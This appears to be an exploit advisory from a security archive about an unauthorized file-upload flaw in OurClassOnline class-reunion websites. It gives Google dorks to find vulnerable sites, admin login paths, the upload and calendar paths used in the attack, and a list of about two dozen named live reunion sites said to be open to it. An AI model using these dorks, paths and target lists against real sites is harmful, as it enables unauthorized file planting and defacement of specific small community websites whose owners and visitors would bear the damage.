Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability

2018.11.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

################################################################################################# # Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 13/11/2018 # Vendor Homepage : webportalpeople.com ~ ourclassonline.com # Tested On : Windows and Linux # Category : WebApps # Google Dorks : intext:''To obtain a site like this for your class visit www.ourclassonline.com.'' intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.'' # Exploit Risk : Medium # CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] ################################################################################################# # Admin and Moderator Panel Login Paths : /admin/index.php /login_form.php?action=reunion /login_form.php?action=news /login_form.php?action=classmates /login_form.php?action=gallery&galleryid=6 /login_form.php?action=gallery&galleryid=2 /login_form.php?action=gallery&galleryid=3 /login_form.php?action=year_review /login_form.php?action=gallery&galleryid=4 ################################################################################################# # Exploit : /forum_topic_create.php?forumid=1 /files_forum/[RANDOM-NUMBER]_[YOUR-FÄ°LENAME-HERE].txt /calendar_add.php /calendar_event.php?eventid=[RANDOM-NUMBER] ################################################################################################# # Example Vulnerable Sites => [+] mcclintockhighchargers1968.com/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/YZhat [+] tech1958.net/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/euIxf [+] tempehighbuffs68.com/forum_topic_create.php?forumid=1 [+] orhs66.com/forum_topic_create.php?forumid=1 [+] denfeld59.com/forum_topic_create.php?forumid=1 [+] edison68.com/forum_topic_create.php?forumid=1 [+] edison64.com/forum_topic_create.php?forumid=1 [+] edison65.com/forum_topic_create.php?forumid=1 [+] marshalltown68.com/forum_topic_create.php?forumid=1 [+] ths1958.com/forum_topic_create.php?forumid=1 [+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1 [+] hths74.com/forum_topic_create.php?forumid=1 [+] salemhighschool1959.com/forum_topic_create.php?forumid=1 [+] lchs1966bulldogs.com/forum_topic_create.php?forumid=1 [+] hooverhighclassof63.com/forum_topic_create.php?forumid=1 [+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1 [+] phs1957.com/forum_topic_create.php?forumid=1 [+] redlandshigh65.com/forum_topic_create.php?forumid=1 [+] warrenmott1983.com/forum_topic_create.php?forumid=1 [+] dulutheast1965.com/forum_topic_create.php?forumid=1 [+] axemen68.org/forum_topic_create.php?forumid=1 [+] olympushigh1967.com/forum_topic_create.php?forumid=1 [+] leuzingerhigh1981.com/forum_topic_create.php?forumid=1 [+] bozemanhawks88.com/forum_topic_create.php?forumid=1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top